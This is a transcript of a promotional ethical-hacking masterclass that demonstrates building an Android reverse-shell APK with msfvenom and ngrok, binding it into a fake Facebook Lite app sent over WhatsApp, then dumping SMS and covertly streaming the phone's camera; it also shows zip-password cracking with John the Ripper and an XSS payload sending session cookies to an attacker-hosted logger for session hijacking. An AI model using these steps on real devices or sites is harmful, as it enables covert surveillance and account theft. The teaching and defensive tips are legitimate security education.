cybercrime. Okay. So our today's agenda is, first of all, we will understand the basic requirements to become an ethical hacker. What certifications do we require? What are the salaries and the scope related to the ethical hacking or a cybersecurity? And is it easy to learn? So for that, we are going to show you some demonstration. So our first demo will be on mobile hacking, where we will create one small application. And in the second demonstration, we are going to bind that application with some popular social media platforms like Facebook, WhatsApp, or any other applications. Then we will understand about passwords, whether we have to keep our password strong or weak. And then we end the session with website VAPT, which will include the XSS, that is cross-site scripting. So first of all, before starting our demonstration, we have to understand the keyword. So many of us are familiar with the keyword called ethical hacking, right? So ethical hacking keyword is not accurate. It's not a proper keyword. The proper and accurate keyword is VAPT. So I know most of us are thinking, what is VAPT, right? So if you're gonna search ethical hacking jobs in Dubai or in UAE, you will find a very little jobs, right? And most of the jobs are related to the trainer. But the correct word is penetration tester or a VAPT jobs in Dubai, right? So we have to understand the correct keyword. Ethical hacker is not a correct keyword, right? Okay. So the question is, many of us are thinking like we already know about the ethical hacking word, right? What is ethical hacking? Uh, to enter into a system with the permission of the owner, right? Because if there is no permission, that it then it will become hacking. Ethical hacking means with the permission, right? So the question is VAPT. So VAPT stands for vulnerability assessment and the penetration testing. So let's take an example. For example, there is a weak lock at your home. So that weak lock is the vulnerability present in the security of your house. And what is penetration testing? The technique to break that lock, right? So there are many websites, there are many network, many mobile applications which has been developed by some software engineer or developers. So many of them are not aware with the hacking or the attackers, and those applications and websites got vulnerable, right? So being an ethical hacker, we have to find the vulnerabilities in those mobile applications, right? So that is the role of ethical hacker, right? Many of us know that by watching some movies or all, we are aware that the role of ethical hacker is to hack the Wi-Fi, to hack the mobile phone, to hack the Windows, or to hack the iPhones, right? So this is not a role of an ethical hacker. What is the role of ethical hacker? To find the bugs present in the application, either it is a mobile or a website, and to report that bugs to the owner or to a developer. That is called VAPT report. So many of us want to come in the field of cybersecurity or ethical hacking or VAPT. Right? But what is the confusion going on in the society in our market? There are tons of courses available on YouTube or on Google. But majorly all trainers are focusing on Wi-Fi hacking, mobile phone hacking, or SQL injection, right? Because this is the demand of a market. And if anyone train on Wi-Fi hacking or mobile phone hacking, obviously they will get a lot of TRP. So this is not a right path. Mobile phone, website, Wi-Fi hacking is also a part of our curriculum, but we have to understand the VAPT, right? So our VAPT is divided into four fields. First of all is network VAPT. Either you can call it VAPT or you can call it penetration testing. So this field is divided into four terms, or there are four fields: network penetration testing, website penetration testing, mobile application penetration testing, and blockchain penetration testing. So there are dozens of jobs available in the market. But first of all, to grab those jobs, you have to be a graduate, either from the BTech or from a BCA background, right? But many of from our past experience, many of students are uh, want to do freelancing as well apart from their jobs. So there are many platforms. Let me show you some platforms. Like first one is HackerOne. This is also a platform for freelancers. If you know about the VAPT, then you can sign up into this website, HackerOne. Second is Bug Crowd. And if you find any bug in these websites means uh, after logging into this website, they will give you some projects. There are dozens of projects. And if on those projects you find a bug, then they will give you a reward, right? And it will be from $100 to $15,000, in between 100 to 15,000, right? Okay. So I hope my point is clear to you all. So to be an VAPT expert, first of all, you must have a computing skills, mm, basic computing skills, right? Computer science degree is preferred, but non-technical person can also join this field. And you have to understand the networking concept, like what are the role of IP addresses, what are the versions, like version 4, version 6, what are the packet formation of 4 and 6, what are DNS, TCP and UDP, the difference between TCP, UDP, what are the parameters of TCPs. You have to know about little bit about the socket programming as well. Then basics of operating system, either on Linux or Ubuntu or Kali. Kali is also an operating system which has been developed by offensive security company. And programming skills, either Python, PHP, Java, or C++. Right? Any of one language is very important for our VAPT. So many students ask me a question that why programming skill is important. See, uh, programming skill is very important whenever we are going to do VAPT on a website or on a mobile application. Many of clients will ask you whether we are going to do black box testing or a white box. What is white box? In white box testing, they are simply going to give you the complete source code, and in the black box testing they are not going to give you the source code. So if they are handing over us the source code, then we must understand about the syntaxes. If we have the good knowledge in languages, of scripting language or any of the language, then you can easily able to find the job. Sorry, you can easily find the bugs, right? Or what is the benefit of learning any of these language? You can make your own exploit. What is exploit? Exploit is a technology used to break into a system, right? Okay. The example I have told you 10 minutes before, like uh, what is vulnerability? Weak lock of your house. And exploit is a technique to break that lock, and that is called penetration testing also. So any of this language is very important for us so that we can develop our own exploit. There is no dependency. So another question is, many of my students ask that websites are developed in Python, some of developed in PHP, Java, .NET. So do we have to learn all the languages? No. You have to learn only one language, either PHP, Java, .NET or Python, because all languages have different syntax, but they have all the similar flow. So learning any of language will give you the technique to understand the flow of that website or application. And then last, we have to understand about the hacking concepts. So what are hacking concepts? Like we have to know about the hashes, steganography, cryptographies, and all these things are called hacking concepts. There are dozens of tools. So in our curriculum, we are not going to depend on the tools only. We are going to develop our own tools, right? Okay. So these are few certifications that are very important, that either OSCP or PNPT. There are dozens of certificates available in the market, but these two certificates are very important for us, right? And our curriculum will based on these OSCP and PNPT only. Okay. OSCP is Offensive Security. This is the company which has developed the Kali Linux. Okay. So what are the job profile? You can be a junior. Okay. So uh, learn the accurate keywords, right? In all these fields, the term ethical hacking is not mentioned here, right? Like you can be a junior cybersecurity analyst or engineer, cybersecurity, senior cybersecurity analyst, cybersecurity manager, senior penetration tester, cybersecurity architect. So these are all the job profiles, right? There is no term called ethical hacking is mentioned in this job profile. So if you gonna write in your resume that I am an ethical hacker, so it will be very hard for you to find the job, right? So keyword is very important for us. Okay, so question is it easy to learn? Okay, so in our today's demonstration, I'm going to demonstrate you on the following, right? Mobile hacking. So I'm going to hack the Android phone by creating a simple application. So this is an operating system which is called Kali, right? Kali Linux. And this application is based on obviously Linux operating system. So many of you are already familiar with Linux and many of you are not familiar, right? So nothing to worry about. It's just a master class. It's just a demonstration class. So do not worry about anything. Like I will be your mentor. I will train you how to operate Linux machine, how to remember the commands, what are the commands. I will provide you proper notes and PPTs, right? So first of all, whenever you open this terminal, what is terminal? It's like a CMD command prompt of your Windows, right? Or if you are familiar with Mac operating system, you already know about the terminal, right? So this is a terminal where you can write a command. So whenever you open the terminal, you can type any command as a guest only, not as a developer or as a root. So first of all, you have to enter into the root, that is called super user, that is called a developer, right? Which will have more privileges to make the changes into this operating system or to modify the files. So to enter into the super user, you have to write a command sudo su stands for super user. Then it will ask for a password. Okay, now I have entered into a root user, right? Root user is like a administrator which will have all the privileges, right? Okay. So in this demonstration, first of all, we have to enable the VPN. So why we are enabling the VPN? It's so that we can have one static IP address. So I have downloaded one VPN that is called ngrok. Okay. So in Linux, if you want to start any application, you have to write dot slash. Typing dot slash will start the application. Right? Then you have to write ngrok TCP 444. So this VPN will start the services TCP service on our system on 4444 port number, and ngrok server will get connected to our machine, and they will provide us one IP address and the port number. So they have provided us one port number, and this is a subdomain which we call as a IP address, right? Now we are going to use one of the services or a software, you can call it as a software of a Linux, that is called MSF Venom, right? MSF Venom. So we have to simply type MSF Venom hyphen P. Hyphen P stands for payload. And we want to hack the Android phone, so you have to type Android. So this is a predefined path which contain the exploit or a payload to hack the Android phones, right? So we have to write MSF Venom hyphen P Android interpreter reverse TCP, and then we have to mention the L host. L host stands for local host, or you can say it as a listening host. I know many of you are not going to understand these points. Don't worry about it, because this point is of mm, of first of all, we have to understand the Linux, right? So don't worry about all these practical. Okay. So in the local host, we have to paste this subdomain which is provided by the ngrok, and then we have to mention the L port. That means listening port, that is 13080. Then we have to type an R. R is for output. Then mention the application name, like I'm mentioning ACDS.apk. So in few seconds, MSF Venom package will create one application file with the name ACDS.apk. And whenever we send this APK to anyone, and once the person install this application, we will get the control over his mobile phone. So there are many ways. This is not a single way. There are many ways to hack the Android phone or the iPhone as well, right? Okay. So we have created the application with the name acds.apk. So we have to go to the downloads, and in here we can able to find this file name. Once was okay. Here it is in the Kali. There is a file present with the ACD. No, this is not a file. Just a second. Just give me a second. Maybe it has been installed in some other folder. Let me check. Okay, just a second. Okay, here it is acds.apk, right? So we are going to open the Firefox in the Kali, and there is a website with the name vtransfer.com. Okay, and in this path, we will drag and drop the acds.apk and then get a link. We will click on get a link. Okay. So they have provided us one link. We will copy this link and we will give it to some person, right? So let me, okay. So before installing this application, we have to write certain commands in the Kali. So we have to write MSF console. MSF console means Meta Exploit Framework. It's a framework similar to, not similar to, like it's a framework like Sublime and all kind of. It's a framework which will provide us the way to execute the commands or to use the auxiliary scanners. So there are dozens of scanners, payloads, exploit present in this MSF console. Right. So in this MSF console, that is Metasploit framework, so they have 2,230 exploits, 1,100 auxiliary scanners, 867 payloads, and 45 encoders and 11 knobs. Okay, so what are all these knobs, encoders, evasions? We will understand later on, right? So we have to write exploit multi-handler. So this multi-handler exploit will able to handle all the request, whatever the request is received by the Kali Linux, right? And then we have to set the payload. Just a second. Set payload, Android, interpreter, reverse, TCP. And so we are setting up this framework that we are going to hack the Android phone, and Android is going to send the request on the TCP protocol. So in this, the L host is required, but it is not filled up. So we will fill this L host by a default IP, that is 000. Then we will exploit this framework, and this framework will run in the background. Okay. So now let me connect my mobile phone with the AnyDesk so that you all can see what I'm going to do. Just a second. So in this demonstration, I'm showing you that there are many ways to hack your mobile phones, and I will tell you that how to keep your Android phone secure, right? You will be surprised that there are dozens of applications are present on the internet. Okay. So there is one, we got one application. Someone shared me this link. So let me click on this link. After clicking on this link, we can able to download this application that is of 10 kilobytes only. Let me open this application, install it. Okay. So ignore this error. Okay, so that is scanning. Okay, don't send. Okay. So the application is installed in our phone with the name uh, main activity. The AnyDesk is little bit slow. Okay, so you all can see the application is installed with the name of main activity. Once you click on this application, nothing will happen, right? Nothing will happen. It's just an icon. Okay. So let me open the Kali now. So once you click on this application, the session is open, right? The session is open. Let me show you the application again. So how you can click many times. Like I hope you all can see that I'm clicking on it. How As many as far you click, we will get those sessions. Like if you're going to click on 20 times, we will get your 20 sessions, right? So I have clicked, I think 30 times maybe. So you have to type sessions hyphen list, that is L. So there are 26 sessions which has been created for that phone. So hyphen I to interact with any of the session. You can type any of the ID, like I'm going to type 3. So we got the control over the phone. Interpreter is meta interpreter. Like whatever command you are going to send from here, it will execute on the Android phone. So you have to you have to type question mark. So these all are the commands which you can execute over your mobile phone. Like I'm going to type dump SMS. So this will download all the SMS, whatever SMS stored in my mobile phone. Okay, so SMS has been stored with this in this file. So let me find this file. Maybe this file is present in downloads. Maybe in the downloads. No, it's not in download. It's in Kali. Okay. Okay. So here is all the SMSs, right? So let me open all the SMS. So these all are the SMS which I have received. Like I have received some recent SMS just few minutes before, right? Okay. So let me close this. You can type any of the command like webcam. You can take a snapshot of the camera as well. Webcam snap one. Okay, it's not tweeting. So it clicked one file, right? So there is a file on my desk. So it clicked it enabled the back camera and click one photograph, right? Even you can type webcam stream. So this will start the screen sharing in few minutes time. So this will start the camera streaming. This is giving you live stream, and user will not be aware that his phone is on stream. Anyone is viewing his mobile phone remotely, right? Okay. So the problem is in my phone, the application is created with the name main activity. You can hide this application as well from the Kali, right? From the Kali, we can hide this application. Okay. So now I will teach you how to bind this application. So we have to enter into the super user. So I already installed one application with the name fb.apk. I already downloaded it from the internet. So to make this demonstration little bit fast. Okay. Do not worry, don't worry. Maybe many of you are thinking like how to do all these practicals. Don't worry. I am here. I am your monitor. I'm your mentor. I will guide you and I will give you all the videos, all the notes. So don't worry about it. And our agenda is not to hack the Android phone. Our agenda is to give a platform where a user can use his mobile phone smartly, right? So my question is, we are using a smartphone. Are we smart or we not, right? So think about it. Okay. So again, we are going to use MSF Venom. So this is our old command, right? If you all remember, we are going to use one small option, that is minus X. Minus X stands for to bind a payload. So I'm inserting one name fb.apk. Minus X is to bind your payload with some application minus P for payload, meter preter, reverse TCP. So all of these videos are available on internet, but the concept is not there and the VAPT thing is not on the internet. So again, I am saying mobile phone hacking, Wi-Fi hacking is not our agenda. Our agenda is VAPT. But to understand the VAPT, these all practicals are very important. Right? So in L host, we are going to copy and paste this IP subdomain from 0 to IO. Okay. Then L port. Second. Sorry. I think I have to type again the port 13272. The domain. We have to type the domain name again because accidentally we close this VPN. And we are creating one application with fbacd new.apk, right? So this hyphen x, what this hyphen x will do, this will reverse engineer the fb.apk, and after reverse engineering this application, this will bind our payload with fb.apk and enter some permissions like audio, call recording, all these permission. This will inbuild this all these permission in this application, and then it will compile and again create a original application. So you can see that meterpreter is embedding some permission like read call log, receive SMS, and all these things. Okay, so I'm receiving some question here. So after this session, we will go with the Q&A round, right? Meanwhile, if you're going to put some questions, so maybe I can't able to read all those questions, right? Okay. So let me check whether the payload or application is created or not. Okay. So we will go to Kali. We will search. Uh, okay, maybe in the downloads. Okay, here is our application fbacd new.apk. So before sending this application, we have to run MSF console. That is Metasploit framework in console mode. I hope you all are enjoying the session, but I know a few of you already are getting these points. Don't worry, only 15 minutes left with us, so I will not going to take your time. Okay, so we have to write again, use exploit multi-handler so that our framework can able to handle all the requests, whatever requests are received by Kali. Then we will set a payload again to Android meterpreter reverse TCP. So ignore all these warnings or errors, nothing to worry about. So set lhost to 0, 0, 0, 0. We will run this exploit in the background. Okay. Now we again going to open the Firefox, and we are going to send the file again. So we are using vTransfer. In the vTransfer, we will upload this application and we will get the link, right? So once this application uploaded, they give us the link. Let me send this link on the WhatsApp, right? Now let me open the AnyDesk. Okay. So I received one application, that is FBACD new.apk. So this demonstration is on application binding. You can bind any of the application, right? So let me open it, install. So this is my latest phone, that is of Android 14, sorry 13. So ignore all these warnings. Sometime it will send you the warnings. Okay. So there is one application created with the Facebook Lite. It's a similar to the to that main activity. So once you click on this Facebook Lite, we will get the session in here, right? So I got the session. You can able to log in the Facebook as well. So you have to type sessions hyphen L, then sessions hyphen I1. Okay. Now you can again type those similar command as a dump SMS, or you can type dump call log, right? Okay. Only one thing you can't do in this Android phone hacking, that is you cannot able to view the WhatsApp messages, right? But you will be surprised that there are many applications, like let me show you, mobile tracker free. Okay. So what is the difference between the application which we are developing? So whenever we are going to learn the curriculum which we are going to provide you, I will always suggest you to create your own application. Do not use third party application, right? Because if you create your own application, you can able to learn the latest mechanism and a little bit about the coding as well. So there are some few there are some applications available in the market as well, that mobile tracker free is totally free of cost. This application is not developed by me, right? It is of some person, I don't know, maybe it's an anonymous group or somewhere. Okay. So in that case, you must have the mobile phone of a victim in your hand, and then you have to install this application by manually. Okay. So how to safeguard yourself by Android phone hacking? Never click on the link which you are receiving on WhatsApp or any social media. And if accidentally you installed any application in your mobile phone, so you have to check the permissions, right? So I'm going to write apps. Okay. And in the apps, let me search that Facebook application. Okay. So here is a Facebook Live. So let me check the permission. So this application has the permission of calendar, call log, camera, contact, location, microphone, SMS, storage. So why this application is taking all the permission? So might be this application containing some virus, or this application is exporting all these data, right? So we have to uninstall this application. So this is the one way. Another way, if your mobile phone is affected by some spyware, so you have to search admin, and in the device admin apps. So if you can see any of the application listed in the device admin, so that means that application is admin of your mobile phone and can export all your data, right? So remove that application from admin apps. Okay. One more way to track any of a attacker. So we have to use one tool, that is Burpsuit or Wireshark. Using these tools, you can find the IP address or the kind of a data getting export from your phone, right? If any person has installed the spyware, so Wireshark will tell you all the packages, sorry, all the packets which are getting sent from your phone. So this is also a way to find the spywares. So it's a small demonstration. Metaphyser has given me only 1 hour, so I can't able to cover all these practicals in this demonstration. Okay, so my next demonstration is on weak password. Okay, so I'm going to open one site. Okay, that is have I been pawned. So let me tell you about this website. Many of you are already familiar with this website. Basically, this website contains all the data which has been hacked and leaked on internet. Like recently, the LinkedIn data has been leaked on internet in 2021. And in 2022, Facebook data has been leaked on internet. So by using this site, you can check that is your data is present on internet. Internet means on this website. So basically, this website purchase all the leaked data which has been leaked on internet, right? So if they can purchase, so any attacker or hacker can also purchase the data, right? So let me type my personal email ID on this website. Okay, so this website is saying that your data has been leaked on 18 websites. So that means I have signed up on many websites, and among those websites, 18 websites are already hacked, right? So what are those websites? Abuse with Us, Zero Web Host, Big Basket, right? And these websites have my email ID and the password. Are you getting my point? Like, if on Zero Web Host, I logged in with the password similar to my Gmail, so anyone having the data of Zero Web Host can able to enter into my Gmail ID. Or if I'm using the same password on different websites, so all my website can get compromised if I'm using the same passwords, right? Like the LinkedIn, they all these all website containing the passwords, right? Paytm is also containing my password that has been leaked. Twitter has been hacked in 2023, and my email ID and password is also leaked, right? Okay, so I hope you are all getting my point. So many of you has already um, wrote read some article that always use different passwords on different websites. So this is the reason. If you are going to use the same password on any website or on every website, if the database of that website get leaked, then anyone can log in into your Gmail or on any application where you are logged in with the same passwords, right? Okay, so many of these companies encrypt their passwords. I hope you all know about the encryption. Let me guide you about little bit about the encryption. Okay. So for example, this is a database, right? This database containing the column with the name email, password, right? So this is my email ID, millindag33@gmail.com. And I have signed up on that website with password 123456. So many of the website do not store password in the clear text. They will store password like this, ABCD 0987, like this. They will store the password in the form of hash, right? They are not going to store my password in clear text. That is 12345. Okay. So if you gonna sign up into any website with a weak password, then your hash will also very weak. But if your password is like that, a mm, like I'm going to use some small characters and a capital and some hash values, special symbols. Okay. So if I'm using strong password, my hash will also be very strong. So what is the problem? If this data is leaked, anyone can break my hash because I'm using weak password. I hope you are all getting this point. If any website database got leaked, but they are not using a clear password in their database, they are storing your password in the form of hash, then anyone can break your hash if your password is weak. But no one can break your hash if your password is strong. Let me show you the demo. Okay, so let me close this. Okay, so first of all, I'm going to create one text file, vi metaphysical with the name meta.txt. Okay, I'm going to create one text file and let me type welcome to ACODS.uk. Let me save this file. Let's check this file with cat meta.txt. Okay, so let's zip this file. Zip -e for encryption. Let's create a zip file with the name meta.zip and we will zip this meta.txt. So this is going to ask me a password. I'm writing this password. Okay, I'm going to tell you the password. The password is admin123. Okay, admin123. Admin123. So basically, this Kali will not show you what password I have uh, wrote down there. So I'm disclosing that I have entered admin123. Okay. So meta.zip. Let me check where is meta.zip. Okay, here it is meta.zip. Okay. So let's try to unzip it. Unzip meta.zip. So this is asking for the password, right? So for save, I do not have the password. Like I'm entering any password. So it's saying that your password is incorrect. Okay. So there is one tool that is zip to John. Okay. That is called John the Ripper. Zip to John. Zip to John meta.zip. We will take out this hash file. Hash. Let's type it Sunday hash. Sunday hash dot txt. So every encrypted file or any password protected file have their own hashes also. So zip2john will help you or John the Ripper will help you to extract that hash file. So let's check that sunday.txt is created or not. Okay, here it is the sunday hash.txt. So let's check sunday hash.txt. So here is your encrypted password, right? So this is your encrypted password. So just imagine your strong password, oh, sorry, your database leaked on internet and someone is having your password but in the encrypted format, right? Okay, so I'm getting the question, but what if hash key is leaked? Okay, so what do you mean by the hash key? Okay, so basically cryptography is of two types, right? So we will understand all these things in the later on. Okay. So now we will use John Sunday hash.txt minus word list equal to. Okay. So this is a word file. This is a dictionary attack. I'm not going to do a brute force attack because it will take a time. So I'm going to use one dictionary that is best 1050. So this word list is saying that password behind the sunday.txt is admin123. So if you are using a weak password, your hash will also be very weak and anyone can break your password, right? Now let's create a file with a strong password, right? So we will create zip hyphen e meta 1.zip and meta.txt, and I'm going to enter one strong password, that is ACDS at the rate 123. ACDS at the rate 123. Okay. I am using some special characters also. So now we will extract that hash file zip to John meta1.zip hash 100.txt. Now John hash 100 minus minus word list equal to user share dirb. Okay. So John the Ripper cannot able to break the password because that password is not contained in our dictionary file. So if you are using a strong password with a combination of small and capital letters, so if the database of that website is also got leaked, then there will be nothing to worry about the different websites, because attacker cannot able to break your passwords, right? Okay. So for today, there is a last demonstration, that is XSS. So that is the part of VAPT. XSS means cross-site scripting. So there are basically three types of XSS. One is reflected, another is stored, and last is DOM XSS. So in reflected XSS, that means if user create any script and enter into the website, that script will not store in the database, but the script will get executed. So executing the user's script is also very dangerous. How it can be dangerous? Because with the help of XSS, anyone can hijack your session, steal passwords, redirect on phishing page, right? Or a malicious website, or can change, okay, or can do any client side attack. So basically, XSS is a client side attack, not a server side attack. So I'm using this machine. Basically, this is a virtual lab, right? It's a lab. It's a testing lab. We are not going to make any practical on some live websites. Okay. So let me type my name, like let me type ACODS. So this is simply typing hello ACODS. Let me check the source file. So in the source file, they are just printing the name which has been entered by the user. There is no security. There is no proper sanitization of the code. So let me type one small script, that is alert ACODS. Let me close the script. So what this script will do, this will create one alert box. So I'm going to test whether this application is vulnerable or not. So this is vulnerability testing. If I execute this script and if this website create an alert box, so that means this website is vulnerable to XSS. Click on submit. So this website creates one alert box with the name of God. So that means this website is vulnerable. Okay. So I hope you understand about the VA. So now let me tell you about the PT. PT means penetration testing. Okay. So I have one script document dot location plus document dot cookie. So what this script will do, this will alert, this will take out the session or a cookie of this website and send this cookie on this location, right? So XSS can create a session hijacking problem. So that will be considered in the PT penetration, right? So let me enter this uh, script. This script What this script will do, let me show you. Go to inspect application. So this is a session ID that is very important session for us. Okay. If anyone having our session, they can log in into your account without password. Let me show you. Okay. So currently I am logged in with the user admin, right? And I am entering this script in this box and click on submit. Once you click on submit, you will redirect it on some other website. Okay. So the domain is suspended. Okay. What I have done, let me show you. I have uploaded one script on this zerofees.us. So let me upload it again. Okay, so basically, so that is why I'm saying coding is very important. So basically, I'm going to sign up on this free web hosting website. So let me sign up with ACODS UK. Password will be the same, and I'm going to use disposable email. This is going to take few minutes. Okay, so I have received one email. Okay, so let me show you one code which has been developed in PHP language. Just a second, let me find. Okay, here it is, tracker. Let me show you this PHP file. So I have created one script. So that script having, we have created one function with the name get IP. So this will get the IP of any user who is going to visit on our website. Okay. And this will get the cookies as well. This will store the cookies as well. Whoever visit on our website or send a cookie to our page. So this will store the cookie. Okay, so what are cookies and what are session? I will guide you later on. So first of all, we need the free web hosting, right? We need a web hosting. So I'm creating one web hosting, free account on a free web hosting. So why I'm creating? Because they have suspended the domain, right? So it will take some time. Okay, so now let me try to log in into this account. This is taking a little bit time. I hope you all are getting the point which I'm telling you. So today class we have understand about the application payload which we have created to hack the phone, right? And then we have learned about the weak password. Now I'm showing you session hijacking. Just a second. I have forgot the password basically. Let me create this again. Okay, so we have logged in into the free web hosting. It will take 5 minutes more. So this is our domain, right? ACODS uk.zerofees.us. So let me copy this domain. So now I'm going to upload the file in the file manager in HTTP docs, right? First, we will delete these files. Okay, and we will upload this index file, right? So let's check whether this domain is ready or not yet. Okay, this domain is ready. In the log file, we will get all the logs. Okay, we will get the logs. So let me type this script again in this. Once we type the script, the user will redirected to accounts this free hosting site. Okay. So now let me refresh this domain. So you can see that we have got the session ID. So if your website is vulnerable with XSS, anyone can export the session of a user or can redirect them to a malicious website. Okay, so all we can see is currently I am logged in with the username admin. Okay, so now let me try to log in some with different user. Let me log in with the Gordon. Okay, as you all can see, I'm logged in with the username Gordon, and I'm going to copy this session, right? Then right click on this Gordon, inspect memory, sorry, application. Go to the session of this Gordon, and we will paste the new session, the session of admin, right? So it is right. You have logged in with Gordon. Let's refresh it. So now I have logged in with the username admin, right? So anyone having your session can log in into your account without knowing your password, right? So this is the way I have taught you about the little glimpse about the VAPT. So it's very small demonstration, right? In our curriculum, there will be more than 100 kinds of bugs, right? Which we're going to explore into the website. And after learning all the bugs, we are going to try those bugs in 3 labs. And after solving those 3 labs, I will give you 2 labs which has been created by ACODS, right? Which has been created by ACODS, and you have to submit a VAPT report. If you score more than 90% in my lab, then you can able to easily crack any of the exam. Either it is OSCP, PNPT, EC Council, any of the exam you can crack it very easily. Okay. So I hope you all have enjoyed. So that's all for today. If you are having any questions, you can ask me directly. So any questions regarding the course, regarding to the curriculum or anything? Okay, so I am receiving some questions. Exam fees. Okay, so fees and everything will be shared by the accords team. So international certifications are having a different fees. Like OSCP is of different fees, EC Council will of different fees. Okay. So the duration, we are going to start the course. Okay, so Shivanjali is asking about the OSCP fees. So OSCP fees in Indian rupees, it will start from 70,000 rupees, right? So they will give you 2 attempts. Don't worry, I will help you in preparation of those exams. Don't worry about all those exams. In single attempt, you can able to crack those exams. Okay, so any other questions you can ask if you are having in your mind?
Okay. Thank you so much, Milind, for this wonderful session. And I hope, guys, you have understood about the different type of the attacks which have been displayed to you. And for all these exam fees and the complete curriculum fees and the exam preparation, whatever the ACODS is actually providing you with all the different services. For that matter, you guys can connect with the specific course specialist or a course consultant, and they will get back to you on that. Okay. So, guys, thank you so much for your time today. Thank you.